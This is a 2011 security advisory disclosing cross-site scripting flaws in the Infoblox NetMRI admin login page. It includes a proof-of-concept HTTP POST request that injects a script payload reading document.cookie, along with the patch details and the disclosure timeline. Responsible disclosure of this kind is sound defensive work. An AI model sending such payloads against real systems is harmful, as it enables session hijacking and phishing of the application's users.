============================================================ FOREGROUND SECURITY, SECURITY ADVISORY 2011-004 - Original release date: November 10, 2011 - Discovered by: Jose Carlos de Arriba - Senior Security Analyst at Foreground Security - Contact: (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com) - Severity: 4.3/10 (Base CVSS Score) ============================================================ I. VULNERABILITY ------------------------- Infoblox NetMRI 6.2.1 (latest version available when the vulnerability was discovered), 6.1.2 and 6.0.2.42 Multiple Cross Site Scripting - XSS (prior versions have not been checked but could be vulnerable too). II. BACKGROUND ------------------------- Infoblox NetMRI is a network automation solution for configuration, optimization and compliance enforcement. With hundreds of built-in rules and industry best practices, it automates network change, intelligently manages device configurations and reduces the risk of human error. III. DESCRIPTION ------------------------- Infoblox NetMRI 6.2.1 (latest version available when the vulnerability was discovered), 6.1.2 and 6.0.2.42 presents multiple Cross-Site Scripting vulnerabilities on its "eulaAccepted" and "mode" parameters in the admin login page, due to an insufficient sanitization on user supplied data and encoding output. A malicious user could perform session hijacking or phishing attacks. IV. PROOF OF CONCEPT ------------------------- POST /netmri/config/userAdmin/login.tdf HTTP/1.1 Content-Length: 691 Cookie: XXXX Host: netmrihost:443 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) formStack=netmri/config/userAdmin/login&eulaAccepted=<script>alert(document.cookie)</script>&mode=<script>alert(document.cookie)</script>&skipjackPassword=ForegroundSecurity&skipjackUsername=ForegroundSecurity&weakPassword=false V. BUSINESS IMPACT ------------------------- An attacker could perform session hijacking or phishing attacks. VI. SYSTEMS AFFECTED ------------------------- Infoblox NetMRI 6.2.1 (latest), 6.1.2 and 6.0.2 branches (prior versions have not been checked but could be vulnerable too). VII. SOLUTION ------------------------- Vulnerability fixed on 6.2.2 version - available as of 10 Nov 2011 Also the following security patches are available: - v6.2.1-NETMRI-8831 - v6.1.2-NETMRI-8831 - v6.0.2-NETMRI-8831 VIII. REFERENCES ------------------------- http://www.infoblox.com/en/products/netmri.html http://www.foregroundsecurity.com/ http://www.painsec.com IX. CREDITS ------------------------- This vulnerability has been discovered by Jose Carlos de Arriba (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com). X. REVISION HISTORY ------------------------- - November 10, 2011: Initial release. XI. DISCLOSURE TIMELINE ------------------------- August 28, 2011: Vulnerability discovered by Jose Carlos de Arriba. August 28, 2011: Vendor contacted by email. August 29: Vendor response asking for details. September 21, 2011: Security advisory sent to vendor. November 10, 2011: Security Fix released by vendor. November 10, 2011: Security advisory released. XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is"with no warranties or guarantees of fitness of use or otherwise. Jose Carlos de Arriba, CISSP Senior Security Analyst Foreground Security www.foregroundsecurity.com jcarriba (at) foregroundsecurity (dot) com
